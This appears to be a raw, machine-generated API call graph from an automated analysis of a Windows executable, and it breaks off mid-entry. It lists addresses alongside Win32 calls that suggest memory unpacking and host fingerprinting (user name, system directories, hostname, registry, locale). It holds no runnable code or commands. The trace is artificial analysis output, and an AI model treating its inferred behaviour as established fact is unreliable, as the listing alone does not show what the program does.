wsprintfA 58189->58216 58193 40b7d0 2 API calls 58190->58193 58192 417eb2 58217 483652 35 API calls 58192->58217 58198 417f3f 58193->58198 58195 417f0b 58194->58195 58220 483652 35 API calls 58194->58220 58212 4200e0 MessageBoxA 58195->58212 58197 417ec2 58218 483652 35 API calls 58197->58218 58213 41b040 58198->58213 58203 417ef5 58221 483652 35 API calls 58203->58221 58204 417f14 58205 4832c2 ctype 32 API calls 58204->58205 58205->58190 58206 417ece 58219 483652 35 API calls 58206->58219 58210 417efe 58222 483652 35 API calls 58210->58222 58212->58204 58223 418600 58213->58223 58216->58192 58217->58197 58218->58206 58219->58194 58220->58203 58221->58210 58222->58195 58224 418625 GetCurrentThreadId 58223->58224 58225 41867e 58223->58225 58224->58225 58226 418633 58224->58226 58287 4173a0 58225->58287 58228 418660 58226->58228 58229 418640 IsWindow 58226->58229 58231 418991 ExitProcess 58228->58231 58232 41866e ExitProcess 58228->58232 58229->58228 58230 41864b SendMessageA 58229->58230 58230->58228 58233 40b7d0 2 API calls 58235 4186ea 58233->58235 58236 40b7d0 2 API calls 58235->58236 58237 418727 58236->58237 58238 40b7d0 2 API calls 58237->58238 58243 418732 58238->58243 58239 41878a 58241 4187cc 58239->58241 58245 4187b2 58239->58245 58246 41879d FreeLibrary 58239->58246 58240 41875e 58244 40b7d0 2 API calls 58240->58244 58250 48324d ctype 35 API calls 58241->58250 58242 418752 FreeLibrary 58242->58243 58243->58239 58243->58240 58243->58242 58247 418769 58244->58247 58248 40b7d0 2 API calls 58245->58248 58246->58245 58246->58246 58251 40b7d0 2 API calls 58247->58251 58249 4187bd 58248->58249 58252 482437 32 API calls 58249->58252 58253 4187de 58250->58253 58254 418774 58251->58254 58252->58241 58255 418803 58253->58255 58256 4187f6 DestroyCursor 58253->58256 58257 40b7d0 2 API calls 58254->58257 58258 41881a 58255->58258 58259 41880d DestroyCursor 58255->58259 58256->58255 58260 41877f 58257->58260 58262 418824 IsWindow 58258->58262 58263 418835 58258->58263 58259->58258 58261 40b7d0 2 API calls 58260->58261 58261->58239 58262->58263 58265 41882f 58262->58265 58294 4161a0 58263->58294 58338 484c12 58265->58338 58268 41888d 58315 41a8c0 58268->58315 58271 41890b 58272 40b7d0 2 API calls 58271->58272 58273 418916 58272->58273 58274 41892b 58273->58274 58275 41891f WSACleanup 58273->58275 58278 418937 58274->58278 58279 418959 58274->58279 58275->58274 58276 4188d3 DestroyCursor 58277 418896 58276->58277 58277->58271 58277->58276 58282 48302c 29 API calls ctype 58277->58282 58278->58279 58346 4181f0 63 API calls ctype 58278->58346 58321 482437 58279->58321 58282->58277 58283 418968 58284 482437 32 API calls 58283->58284 58285 418977 58284->58285 58285->58231 58286 418981 OleUninitialize 58285->58286 58286->58231 58288 40b7d0 2 API calls 58287->58288 58289 4173ae 58288->58289 58290 40b7d0 2 API calls 58289->58290 58291 4173b9 58290->58291 58292 40b7d0 2 API calls 58291->58292 58293 4173c4 58292->58293 58293->58233 58302 4161d8 58294->58302 58295 416275 58297 40b7d0 2 API calls 58295->58297 58296 483854 23 API calls 58296->58302 58298 416280 58297->58298 58299 40b7d0 2 API calls 58298->58299 58300 41628b 58299->58300 58303 4826d1 58300->58303 58301 483892 23 API calls 58301->58302 58302->58295 58302->58296 58302->58301 58304 4826e1 58303->58304 58305 4826ed 58304->58305 58306 482704 58304->58306 58347 48302c 29 API calls ___free_lc_time 58305->58347 58308 48270b 58306->58308 58311 482730 58306->58311 58348 483003 29 API calls ___free_lc_time 58308->58348 58310 4826f5 ctype 58310->58268 58311->58310 58349 483003 29 API calls ___free_lc_time 58311->58349 58313 48279e ctype 58350 48302c 29 API calls ___free_lc_time 58313->58350 58316 41a8c8 58315->58316 58351 41aa80 58316->58351 58320 41a8d9 58320->58277 58322 482447 58321->58322 58323 482453 58322->58323 58324 482477 58322->58324 58385 482415 32 API calls ctype 58323->58385 58326 48247e 58324->58326 58327 4824a1 58324->58327 58387 483003 29 API calls ___free_lc_time 58326->58387 58332 4824a8 58327->58332 58333 4824d1 58327->58333 58328 48245e 58386 48302c 29 API calls ___free_lc_time 58328->58386 58331 482466 58331->58283 58332->58331 58388 482415 32 API calls ctype 58332->58388 58389 483003 29 API calls ___free_lc_time 58333->58389 58336 482513 ctype 58390 48302c 29 API calls ___free_lc_time 58336->58390 58339 484c1c __EH_prolog 58338->58339 58391 48c6e5 58339->58391 58341 484c22 ctype 58344 484c60 ctype 58341->58344 58396 483003 29 API calls ___free_lc_time 58341->58396 58343 484c44 58343->58344 58397 488c61 29 API calls 2 library calls 58343->58397 58344->58263 58346->58278 58347->58310 58348->58310 58349->58313 58350->58310 58352 41aa93 58351->58352 58353 41aacc 58351->58353 58352->58353 58357 41aaba WaitForSingleObject 58352->58357 58354 41aaf5 58353->58354 58355 41aad8 CloseHandle 58353->58355 58356 41ab16 58354->58356 58380 4280b0 39 API calls ctype 58354->58380 58355->58354 58375 416120 58356->58375 58357->58353 58361 43cbb0 58362 43cbd3 58361->58362 58363 43cbe8 RtlEnterCriticalSection 58361->58363 58381 43cca0 RtlEnterCriticalSection SetEvent RtlLeaveCriticalSection 58362->58381 58366 43cc0f 58363->58366 58365 43cc41 RtlLeaveCriticalSection 58383 43cca0 RtlEnterCriticalSection SetEvent RtlLeaveCriticalSection 58365->58383 58366->58365 58382 4298e0 29 API calls ctype 58366->58382 58367 43cbd8 58367->58320 58370 43cc51 58371 43cc79 58370->58371 58372 43cc6e WaitForSingleObject 58370->58372 58384 48302c 29 API calls ___free_lc_time 58371->58384 58372->58370 58374 43cc7f 58374->58320 58376 40b7d0 2 API calls 58375->58376 58377 41612e 58376->58377 58378 40b7d0 2 API calls 58377->58378 58379 416139 58378->58379 58379->58361 58380->58356 58381->58367 58382->58366 58383->58370 58384->58374 58385->58328 58386->58331 58387->58331 58388->58331 58389->58336 58390->58331 58398 48c6bf 58391->58398 58394 48cc47 ctype 21 API calls 58395 48c6fb 58394->58395 58395->58341 58396->58343 58397->58344 58399 48cc47 ctype 21 API calls 58398->58399 58400 48c6ce 58399->58400 58401 48c6e4 58400->58401 58403 48ccdc 58400->58403 58401->58394 58404 48cce6 __EH_prolog 58403->58404 58405 48cd14 58404->58405 58409 48d91f 6 API calls ctype 58404->58409 58405->58401 58407 48ccfd 58410 48d98f RtlLeaveCriticalSection 58407->58410 58409->58407 58410->58405 58411 40b4c0 58416 416160 58411->58416 58414 40b4e3 inet_ntoa 58415 40b4f5 58414->58415 58417 416173 WSAStartup 58416->58417 58418 40b4d2 gethostbyname 58416->58418 58417->58418 58418->58414 58418->58415 58419 40b3c0 58422 40aff0 58419->58422 58458 40ae90 58422->58458 58424 40b042 RegOpenKeyExA 58425 40b068 RegQueryValueExA 58424->58425 58428 40b17b 58424->58428 58426 40b2e1 RegCloseKey 58425->58426 58429 40b098 58425->58429 58426->58428 58427 40b0ab 58427->58426 58430 4832c2 ctype 32 API calls 58428->58430 58429->58426 58429->58427 58432 40b196 ExpandEnvironmentStringsA 58429->58432 58433 40b0eb 58429->58433 58434 40b1de 58429->58434 58431 40b38e 58430->58431 58432->58426 58435 40b1c4 RegCloseKey 58432->58435 58436 40b5f0 7 API calls 58433->58436 58437 40b5f0 7 API calls 58434->58437 58435->58428 58439 40b10a 58436->58439 58438 40b1fd 58437->58438 58440 40b207 RegQueryValueExA 58438->58440 58441 40b180 58438->58441 58439->58441 58442 40b110 RegQueryValueExA 58439->58442 58440->58441 58443 40b228 RegCloseKey ExpandEnvironmentStringsA 58440->58443 58446 40b7d0 2 API calls 58441->58446 58442->58441 58444 40b12b RegCloseKey 58442->58444 58447 40b250 58443->58447 58445 40b13d 58444->58445 58450 40b7d0 2 API calls 58445->58450 58446->58426 58448 40b5f0 7 API calls 58447->58448 58449 40b266 58448->58449 58451 40b2b5 58449->58451 58452 40b26c ExpandEnvironmentStringsA 58449->58452 58450->58428 58454 40b7d0 2 API calls 58451->58454 58453 40b27e 58452->58453 58455 40b7d0 2 API calls 58453->58455 58454->58441 58456 40b29e 58455->58456 58457 40b7d0 2 API calls 58456->58457 58457->58428 58459 40aeb0 58458->58459 58463 40af09 58458->58463 58460 4833ff ctype 35 API calls 58459->58460 58461 40aec0 58460->58461 58483 483652 35 API calls 58461->58483 58465 40af7c 58463->58465 58466 40af5c 58463->58466 58464 40aece 58484 483652 35 API calls 58464->58484 58470 483330 67 API calls 58465->58470 58468 48324d ctype 35 API calls 58466->58468 58471 40af65 58468->58471 58469 40aeda 58485 483652 35 API calls 58469->58485 58473 40af86 58470->58473 58471->58424 58486 480fc6 37 API calls 2 library calls 58473->58486 58474 40aee5 58474->58424 58476 40af9d 58487 4833af 58476->58487 58479 4832c2 ctype 32 API calls 58480 40afba 58479->58480 58481 4832c2 ctype 32 API calls 58480->58481 58482 40afd5 58481->58482 58482->58424 58483->58464 58484->58469 58485->58474 58486->58476 58488 4833bf 58487->58488 58493 40afac 58487->58493 58489 4833d6 58488->58489 58490 4833e3 58488->58490 58491 483382 ctype 34 API calls 58489->58491 58495 4831f9 32 API calls ctype 58490->58495 58491->58493 58493->58479 58494 4833ea InterlockedIncrement 58494->58493 58495->58494 58496 40b480 58497 416160 WSAStartup 58496->58497 58498 40b492 gethostname 58497->58498 58499 40b4a4 58498->58499 58500 470483 58501 470495 58500->58501 58505 4704f2 58500->58505 58503 4704a6 ___free_lc_time 58501->58503 58501->58505 58511 477589 46 API calls ___free_lc_time 58501->58511 58503->58505 58506 47754a 58503->58506 58507 477557 58506->58507 58508 477553 58506->58508 58512 47d13f 58507->58512 58508->58503 58511->58503 58513 47d172 CompareStringW 58512->58513 58515 47d187 58512->58515 58514 47d18f CompareStringA 58513->58514 58513->58515 58514->58515 58519 477576 58514->58519 58516 47d1e8 CompareStringA 58515->58516 58517 47d203 58515->58517 58516->58519 58518 47d2bd MultiByteToWideChar 58517->58518 58517->58519 58520 47d242 GetCPInfo 58517->58520 58518->58519 58522 47d2d9 58518->58522 58519->58503 58520->58519 58521 47d257 58520->58521 58521->58518 58521->58519 58522->58519 58523 47d315 MultiByteToWideChar 58522->58523 58523->58519 58524 47d32f MultiByteToWideChar 58523->58524 58524->58519 58525 47d347 58524->58525 58525->58519 58526 47d37b MultiByteToWideChar 58525->58526 58526->58519 58527 47d392 CompareStringW 58526->58527 58527->58519 58528 46eb40 58529 46eb67 58528->58529 58530 46ebdb 58528->58530 58529->58530 58538 46eb6c SHGetSpecialFolderPathA 58529->58538 58531 46ebf2 58530->58531 58532 46ebe0 GetWindowsDirectoryA 58530->58532 58533 46ebf7 GetSystemDirectoryA 58531->58533 58534 46ec09 58531->58534 58537 46ebd9 58532->58537 58533->58537 58536 46ec0e GetTempPathA 58534->58536 58534->58537 58536->58537 58538->58537 58539 484ee0 58540 48ccdc ctype 7 API calls 58539->58540 58541 484ef4 58540->58541 58545 484f3e 58541->58545 58573 486a53 7 API calls 58541->58573 58544 484f42 58545->58544 58546 484d81 58545->58546 58574 473304 58546->58574 58548 484d8b GetPropA 58549 484e6b 58548->58549 58550 484dbe 58548->58550 58551 484c84 58 API calls 58549->58551 58552 484e4a 58550->58552 58553 484dc7 58550->58553 58555 484e73 58551->58555 58554 484c84 58 API calls 58552->58554 58556 484dcc 58553->58556 58557 484e26 SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 58553->58557 58559 484e50 58554->58559 58560 484c84 58 API calls 58555->58560 58558 484e89 CallWindowProcA 58556->58558 58561 484dd7 58556->58561 58557->58558 58565 484e12 58558->58565 58599 484a43 66 API calls 58559->58599 58563 484e7b 58560->58563 58575 484c84 58561->58575 58600 4849e2 64 API calls 58563->58600 58565->58544 58566 484e62 58569 484e85 58566->58569 58569->58558 58569->58565 58573->58545 58574->58548 58576 484c12 ctype 57 API calls 58575->58576 58577 484c8d 58576->58577 58601 488cc6 58577->58601 58579 484c9a 58607 4876ab 58579->58607 58581 484ca4 58582 484946 GetWindowRect 58581->58582 58613 4874ea 58582->58613 58584 48495f CallWindowProcA 58585 484969 58584->58585 58586 4849dd 58585->58586 58587 484976 58585->58587 58586->58565 58588 4874ea GetWindowLongA 58587->58588 58589 484980 58588->58589 58589->58586 58590 484987 GetWindowRect 58589->58590 58590->58586 58591 48499e 58590->58591 58591->58586 58592 4849a6 GetWindow 58591->58592 58593 484c84 58 API calls 58592->58593 58594 4849b7 58593->58594 58596 4849c2 58594->58596 58616 487648 IsWindowEnabled 58594->58616 58596->58586 58597 4849d4 58596->58597 58617 486b88 34 API calls 58597->58617 58599->58566 58600->58569 58602 488cd0 __EH_prolog ctype 58601->58602 58603 488d45 58602->58603 58606 488ce1 ctype 58602->58606 58611 481443 RaiseException ctype 58602->58611 58612 482c84 29 API calls ctype 58603->58612 58606->58579 58608 4876b2 58607->58608 58610 4876ce ctype 58607->58610 58609 4876b8 GetParent 58608->58609 58608->58610 58609->58610 58610->58581 58612->58606 58614 4874fd 58613->58614 58615 4874f1 GetWindowLongA 58613->58615 58615->58584 58616->58596 58617->58586 58618 48d742 58623 48d74c 58618->58623 58620 48d747 58631 4719eb 35 API calls 58620->58631 58622 48d760 58624 48d7be GetVersion 58623->58624 58625 48d7ff GetProcessVersion 58624->58625 58626 48d811 58624->58626 58625->58626 58632 4891f9 KiUserCallbackDispatcher GetSystemMetrics 58626->58632 58628 48d818 58639 4891b5 7 API calls 58628->58639 58630 48d822 LoadCursorA LoadCursorA 58630->58620 58631->58622 58633 489218 58632->58633 58634 48921f 58632->58634 58640 48d76c GetSystemMetrics GetSystemMetrics 58633->58640 58641 48d79c GetSystemMetrics GetSystemMetrics 58634->58641 58637 48921d 58638 489224 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 58637->58638 58638->58628 58639->58630 58640->58637 58641->58638 58642 483b64 SetFilePointer 58643 483b8d 58642->58643 58644 483b7f GetLastError 58642->58644 58646 488652 36 API calls ctype 58644->58646 58646->58643 58647 50abdf 58649 50abe6 58647->58649 58650 50abfa 58649->58650 58651 50ac0c VirtualAlloc 58649->58651 58650->58651 58654 50ae4e 58650->58654 58652 50ac48 58651->58652 58651->58654 58655 50ac53 58652->58655 58656 50ac62 58655->58656 58657 50acc3 VirtualFree 58656->58657 58658 50aceb 58657->58658 58659 50ae4e 58658->58659 58660 50ae2f VirtualProtect 58658->58660 58659->58654 58660->58659 58660->58660 58661 41ab30 58664 43c3f0 GetProcessHeap 58661->58664 58665 43c453 OleInitialize 58664->58665 58666 43c465 GetModuleFileNameA 58664->58666 58665->58666 58717 471d67 58666->58717 58668 43c487 58669 43c490 58668->58669 58670 43c4ab 58668->58670 58671 4833ff ctype 35 API calls 58669->58671 58672 48324d ctype 35 API calls 58670->58672 58673 43c4a7 58671->58673 58672->58673 58674 4833ff ctype 35 API calls 58673->58674 58675 43c4ca SetCurrentDirectoryA 58674->58675 58676 43c4ed 58675->58676 58677 43c521 LoadCursorA GetStockObject 58676->58677 58723 41fd80 58677->58723 58682 43c586 58687 43c5fa 58682->58687 58736 40bd00 7 API calls 58682->58736 58684 43c5cb 58737 40bd00 7 API calls 58684->58737 58685 41ab3d 58689 43c6bf 58687->58689 58740 40bd00 7 API calls 58687->58740 58689->58685 58692 483854 23 API calls 58689->58692 58690 43c5d9 58738 40bd00 7 API calls 58690->58738 58691 43c6a6 58741 40bd00 7 API calls 58691->58741 58697 43c6eb 58692->58697 58695 43c5e9 58739 40bd00 7 API calls 58695->58739 58742 48a146 29 API calls 2 library calls 58697->58742 58699 43c72e 58743 414650 46 API calls ctype 58699->58743 58701 43c741 58744 48a222 32 API calls 2 library calls 58701->58744 58703 43c75a 58745 48a9ee 39 API calls 2 library calls 58703->58745 58705 43c766 58746 483892 23 API calls 58705->58746 58707 43c76e 58747 413c10 7 API calls 58707->58747 58709 43c88c 58710 40b7d0 2 API calls 58709->58710 58711 43c894 58710->58711 58748 414590 64 API calls ctype 58711->58748 58713 43c8aa 58714 40b7d0 2 API calls 58713->58714 58715 43c90a 58714->58715 58716 40b7d0 2 API calls 58715->58716 58716->58685 58718 471d75 58717->58718 58719 471d84 58717->58719 58718->58668 58749 4774d4 29 API calls 2 library calls 58719->58749 58721 471d8c 58750 477535 RtlLeaveCriticalSection 58721->58750 58724 48c6bf ctype 28 API calls 58723->58724 58725 41fd8a GetClassInfoA 58724->58725 58726 41fda2 58725->58726 58727 41fdea 58725->58727 58751 485824 32 API calls 2 library calls 58726->58751 58729 4851e0 58727->58729 58730 48c6bf ctype 28 API calls 58729->58730 58731 48522a 58730->58731 58734 43c571 GetCurrentThreadId 58731->58734 58752 485152 58731->58752 58734->58682 58736->58684 58737->58690 58738->58695 58739->58687 58740->58691 58741->58689 58742->58699 58743->58701 58744->58703 58745->58705 58746->58707 58747->58709 58748->58713 58749->58721 58750->58718 58751->58727 58753 48cc47 ctype 21 API calls 58752->58753 58754 485163 58753->58754 58755 485196 CreateWindowExA 58754->58755 58756 485174 GetCurrentThreadId SetWindowsHookExA 58754->58756 58759 48519e 58755->58759 58756->58755 58757 485191 58756->58757 58766 481443 RaiseException ctype 58757->58766 58760 48cc47 ctype 21 API calls 58759->58760 58761 4851ae 58760->58761 58762 48c6bf ctype 28 API calls 58761->58762 58763 4851b5 58762->58763 58764 4851c2 UnhookWindowsHookEx 58763->58764 58765 4851cd 58763->58765 58764->58765 58765->58734 58767 484f5c 58768 48cc47 ctype 21 API calls 58767->58768 58769 484f71 58768->58769 58770 484f7a CallNextHookEx 58769->58770 58771 484f91 58769->58771 58784 485149 58770->58784 58772 48c6bf ctype 28 API calls 58771->58772 58773 484fa1 58772->58773 58774 4850b9 CallNextHookEx 58773->58774 58775 484fca GetClassLongA 58773->58775 58776 485016 58773->58776 58774->58784 58785 48513c UnhookWindowsHookEx 58774->58785 58775->58774 58777 484fde 58775->58777 58779 48501e 58776->58779 58780 4850c7 GetWindowLongA 58776->58780 58782 484feb GlobalGetAtomNameA 58777->58782 58783 485002 lstrcmpi 58777->58783 58800 484cc9 58 API calls ctype 58779->58800 58780->58774 58781 4850d7 GetPropA 58780->58781 58781->58774 58787 4850ea SetPropA GetPropA 58781->58787 58782->58783 58783->58774 58783->58776 58785->58784 58787->58774 58788 4850fe GlobalAddAtomA 58787->58788 58789 485118 SetWindowLongA 58788->58789 58790 485113 58788->58790 58789->58774 58790->58789 58791 4850a4 58792 4850a9 SetWindowLongA 58791->58792 58792->58774 58793 485026 58793->58791 58801 484ab9 58793->58801 58796 485070 58797 485075 GetWindowLongA 58796->58797 58798 485092 58797->58798 58798->58774 58799 485096 SetWindowLongA 58798->58799 58799->58774 58800->58793 58802 484ac3 __EH_prolog 58801->58802 58803 48cc47 ctype 21 API calls 58802->58803 58804 484adb 58803->58804 58805 484b38 58804->58805 58806 484946 2 API calls 58804->58806 58811 485ae7 58805->58811 58806->58805 58808 484b61 58808->58791 58808->58796 58809 484969 95 API calls 58809->58808 58812 485b09 58811->58812 58813 484b49 58812->58813 58815 48551d 58812->58815 58813->58808 58813->58809 58816 48552a 58815->58816 58817 48554c CallWindowProcA 58815->58817 58816->58817 58819 485538 NtdllDefWindowProc_A 58816->58819 58818 48555f 58817->58818 58818->58813 58819->58818 58820 4684f0 58821 468503 58820->58821 58824 4688c0 58821->58824 58823 468511 58879 468ce0 58824->58879 58831 4833af 35 API calls 58832 468928 58831->58832 58833 4832c2 ctype 32 API calls 58832->58833 58834 468936 58833->58834 58898 468c40 58834->58898 58837 4832c2 ctype 32 API calls 58838 468996 58837->58838 58901 468c00 58838->58901 58843 4832c2 ctype 32 API calls 58844 4689bb 58843->58844 58907 468c60 58844->58907 58847 4832c2 ctype 32 API calls 58848 4689f6 GetUserNameA GetWindowsDirectoryA GetSystemDirectoryA 58847->58848 58910 468ca0 58848->58910 58851 4832c2 ctype 32 API calls 58852 468a74 58851->58852 58853 468c00 36 API calls 58852->58853 58854 468a8c 58853->58854 58855 4832c2 ctype 32 API calls 58854->58855 58856 468abc 58855->58856 58857 468c60 36 API calls 58856->58857 58858 468aca 58857->58858 58859 4832c2 ctype 32 API calls 58858->58859 58860 468afa 58859->58860 58913 468c80 36 API calls 58860->58913 58862 468b08 58863 4832c2 ctype 32 API calls 58862->58863 58864 468b38 58863->58864 58865 468c40 36 API calls 58864->58865 58866 468b46 58865->58866 58867 4832c2 ctype 32 API calls 58866->58867 58868 468b76 58867->58868 58914 468cc0 36 API calls 58868->58914 58870 468b84 58871 4832c2 ctype 32 API calls 58870->58871 58872 468bb4 58871->58872 58873 4832c2 ctype 32 API calls 58872->58873 58874 468bc2 58873->58874 58915 46d180 32 API calls ctype 58874->58915 58876 468bd0 58916 468dc0 32 API calls ctype 58876->58916 58878 468be1 58878->58823 58880 4833ff ctype 35 API calls 58879->58880 58881 468d50 58880->58881 58882 4833ff ctype 35 API calls 58881->58882 58883 468d5c 58882->58883 58884 4833ff ctype 35 API calls 58883->58884 58885 468d68 58884->58885 58886 4833ff ctype 35 API calls 58885->58886 58887 468d74 58886->58887 58888 4833ff ctype 35 API calls 58887->58888 58889 468d81 58888->58889 58917 468e90 GetVersionExA 58889->58917 58892 46d0e0 59223 46d210 GetKeyboardLayout GetLocaleInfoA 58892->59223 58895 468c20 59242 483037 58895->59242 58899 483037 36 API calls 58898->58899 58900 468969 58899->58900 58900->58837 58902 483037 36 API calls 58901->58902 58903 4689a4 58902->58903 58904 4709b8 58903->58904 59247 47092d 58904->59247 58908 483037 36 API calls 58907->58908 58909 4689c9 58908->58909 58909->58847 58911 483037 36 API calls 58910->58911 58912 468a44 58911->58912 58912->58851 58913->58862 58914->58870 58915->58876 58916->58878 58918 468ee6 GetVersionExA 58917->58918 58919 468f03 58917->58919 58918->58919 58920 4688e4 58918->58920 58921 468f12 58919->58921 58922 469723 58919->58922 58920->58892 58924 469666 58921->58924 58925 468f19 58921->58925 59185 483652 35 API calls 58922->59185 58928 469336 58924->58928 58971 4696b2 58924->58971 59179 483652 35 API calls 58924->59179 58925->58928 58933 468f37 58925->58933 59135 483652 35 API calls 58925->59135 59186 46e090 9 API calls 58928->59186 58929 46907a 58942 46933b 58929->58942 58943 469088 58929->58943 58930 46968c 58938 469697 58930->58938 59180 483679 34 API calls 58930->59180 58931 46970d 59184 483652 35 API calls 58931->59184 58932 468f63 58941 468f8d 58932->58941 58978 468fb7 58932->58978 59137 483652 35 API calls 58932->59137 58933->58932 58933->58978 59136 483652 35 API calls 58933->59136 58936 468fd7 58947 469000 58936->58947 58948 468fe1 58936->58948 58937 469023 58937->58942 58958 469036 58937->58958 58959 469059 58937->58959 59181 483652 35 API calls 58938->59181 58941->58942 58941->58978 59138 483652 35 API calls 58941->59138 59163 480102 41 API calls 58942->59163 59143 480102 41 API calls 58943->59143 58944 469782 58952 46a15e 58944->58952 58953 46978a 58944->58953 58945 4696da 58954 4696f0 58945->58954 59183 483652 35 API calls 58945->59183 59140 483652 35 API calls 58947->59140 59139 483652 35 API calls 58948->59139 59222 47262f 48 API calls 58952->59222 58965 469fb5 58953->58965 58966 46979b 58953->58966 58954->58928 58954->58931 59141 483652 35 API calls 58958->59141 59142 483652 35 API calls 58959->59142 58961 4693ad 58973 4693c2 58961->58973 58974 4693b2 58961->58974 58962 4690fa 58976 46910f 58962->58976 58977 4690ff 58962->58977 59216 47262f 48 API calls 58965->59216 58967 4698fd 58966->58967 59021 4697a2 58966->59021 58998 469916 58967->58998 58999 469a3f 58967->58999 58968 468fee 58981 4833ff ctype 35 API calls 58968->58981 58970 46900d 58982 4833ff ctype 35 API calls 58970->58982 58971->58928 58971->58954 59182 483652 35 API calls 58971->59182 59165 48062d 41 API calls 3 library calls 58973->59165 59164 47fdab 30 API calls 3 library calls 58974->59164 59145 48062d 41 API calls 3 library calls 58976->59145 59144 47fdab 30 API calls 3 library calls 58977->59144 58978->58929 58978->58936 58978->58937 58979 46a16d 58980 4833ff ctype 35 API calls 58979->58980 58990 46a17d 58980->58990 58992 468ffb 58981->58992 58982->58992 58983 469043 58993 4833ff ctype 35 API calls 58983->58993 58985 469066 58994 4833ff ctype 35 API calls 58985->58994 58989 46912a 59146 4804ca 39 API calls 58989->59146 58997 4833ff ctype 35 API calls 58990->58997 58992->58929 58993->58992 58994->58992 58995 4693d9 59166 4804ca 39 API calls 58995->59166 59002 46a18a 58997->59002 59188 47262f 48 API calls 58998->59188 59013 469bb1 58999->59013 59014 469a58 58999->59014 59001 46913a 59147 46a1f0 40 API calls 59001->59147 59007 4833ff ctype 35 API calls 59002->59007 59004 4833ff ctype 35 API calls 59009 46a001 59004->59009 59005 4693e9 59167 4804ca 39 API calls 59005->59167 59012 46a127 59007->59012 59008 469925 59189 46e750 44 API calls 59008->59189 59217 47262f 48 API calls 59009->59217 59011 469145 59148 480566 RtlLeaveCriticalSection 59011->59148 59024 4833ff ctype 35 API calls 59012->59024 59029 469bca 59013->59029 59048 469d93 59013->59048 59195 47262f 48 API calls 59014->59195 59017 4693f8 59168 480566 RtlLeaveCriticalSection 59017->59168 59020 469966 59070 46996a 59020->59070 59190 46e690 44 API calls 59020->59190 59187 47262f 48 API calls 59021->59187 59022 46a018 59026 4833ff ctype 35 API calls 59022->59026 59023 46914e 59149 46ae80 29 API calls ctype 59023->59149 59028 46a1a4 59024->59028 59025 469a67 59196 46e820 44 API calls 59025->59196 59032 46a057 59026->59032 59028->58920 59201 47262f 48 API calls 59029->59201 59218 47262f 48 API calls 59032->59218 59033 46940d 59169 480566 RtlLeaveCriticalSection 59033->59169 59036 469aa8 59069 469aac 59036->59069 59197 46e870 44 API calls 59036->59197 59037 469982 59037->59070 59191 46e640 44 API calls 59037->59191 59040 469416 59170 46afc0 30 API calls 59040->59170 59042 46a06e 59219 483652 35 API calls 59042->59219 59043 4699cd 59194 46e7d0 44 API calls 59043->59194 59044 469191 59150 46afc0 30 API calls 59044->59150 59079 4698c4 59048->59079 59208 47262f 48 API calls 59048->59208 59050 469ac4 59050->59069 59198 46e920 44 API calls 59050->59198 59051 46999e 59051->59070 59192 46e6e0 44 API calls 59051->59192 59052 46a0aa 59059 46a102 59052->59059 59220 47262f 48 API calls 59052->59220 59057 4691fd 59151 46a2b0 64 API calls ctype 59057->59151 59058 469bd9 59100 469c1e 59058->59100 59202 46e9a0 44 API calls 59058->59202 59059->59028 59221 47262f 48 API calls 59059->59221 59060 469554 59171 46afc0 30 API calls 59060->59171 59067 469207 59152 46afc0 30 API calls 59067->59152 59068 469c36 59068->59100 59203 46e9f0 44 API calls 59068->59203 59092 469af3 59069->59092 59199 47262f 48 API calls 59069->59199 59070->59043 59193 47262f 48 API calls 59070->59193 59071 46a0c5 59077 4833ff ctype 35 API calls 59071->59077 59075 46955d 59172 46a2b0 64 API calls ctype 59075->59172 59077->59059 59078 469dbb 59109 469e00 59078->59109 59209 46e9a0 44 API calls 59078->59209 59079->59004 59079->59009 59081 46920d 59153 46a2b0 64 API calls ctype 59081->59153 59084 469567 59173 46afc0 30 API calls 59084->59173 59087 469c52 59087->59100 59204 46eaa0 44 API calls 59087->59204 59088 469e18 59088->59109 59210 46e9f0 44 API calls 59088->59210 59091 469217 59154 46afc0 30 API calls 59091->59154 59106 469b63 59092->59106 59200 47262f 48 API calls 59092->59200 59094 46956d 59174 46a5b0 30 API calls 59094->59174 59097 469e34 59097->59109 59211 46eaa0 44 API calls 59097->59211 59099 46921d 59155 46afc0 30 API calls 59099->59155 59101 469c81 59100->59101 59205 47262f 48 API calls 59100->59205 59101->59106 59206 47262f 48 API calls 59101->59206 59103 469578 59107 4695c0 59103->59107 59175 48302c 29 API calls ___free_lc_time 59103->59175 59124 469a0e 59106->59124 59207 47262f 48 API calls 59106->59207 59111 46961e 59107->59111 59176 4804ca 39 API calls 59107->59176 59108 469226 59156 46afc0 30 API calls 59108->59156 59114 469e63 59109->59114 59212 47262f 48 API calls 59109->59212 59178 480090 40 API calls __EH_prolog 59111->59178 59125 469ed3 59114->59125 59213 47262f 48 API calls 59114->59213 59117 46922f 59157 46a2b0 64 API calls ctype 59117->59157 59119 4695fa 59177 480566 RtlLeaveCriticalSection 59119->59177 59121 469239 59158 46afc0 30 API calls 59121->59158 59124->59079 59215 47262f 48 API calls 59124->59215 59125->59124 59214 47262f 48 API calls 59125->59214 59126 46923f 59159 46a5b0 30 API calls 59126->59159 59129 46924a 59130 4692bd 59129->59130 59160 48302c 29 API calls ___free_lc_time 59129->59160 59132 4692f3 59130->59132 59161 46a220 40 API calls 59130->59161 59162 480090 40 API calls __EH_prolog 59132->59162 59135->58933 59136->58932 59137->58941 59138->58978 59139->58968 59140->58970 59141->58983 59142->58985 59143->58962 59144->58976 59145->58989 59146->59001 59147->59011 59148->59023 59149->59044 59150->59057 59151->59067 59152->59081 59153->59091 59154->59099 59155->59108 59156->59117 59157->59121 59158->59126 59159->59129 59160->59130 59161->59132 59162->58928 59163->58961 59164->58973 59165->58995 59166->59005 59167->59017 59168->59033 59169->59040 59170->59060 59171->59075 59172->59084 59173->59094 59174->59103 59175->59107 59176->59119 59177->59111 59178->58928 59179->58930 59180->58938 59181->58971 59182->58945 59183->58954 59184->58928 59185->58928 59186->58944 59187->59079 59188->59008 59189->59020 59190->59037 59191->59051 59192->59070 59193->59043 59194->59124 59195->59025 59196->59036 59197->59050 59198->59069 59199->59092 59200->59106 59201->59058 59202->59068 59203->59087 59204->59100 59205->59101 59206->59106 59207->59124 59208->59078 59209->59088 59210->59097 59211->59109 59212->59114 59213->59125 59214->59124 59215->59079 59216->59079 59217->59022 59218->59042 59219->59052 59220->59071 59221->59012 59222->58979 59224 4709b8 6 API calls 59223->59224 59225 46d24a GetLocaleInfoA 59224->59225 59226 4833ff ctype 35 API calls 59225->59226 59227 46d275 GetLocaleInfoA 59226->59227 59228 4709b8 6 API calls 59227->59228 59229 46d28b GetLocaleInfoA 59228->59229 59230 4833ff ctype 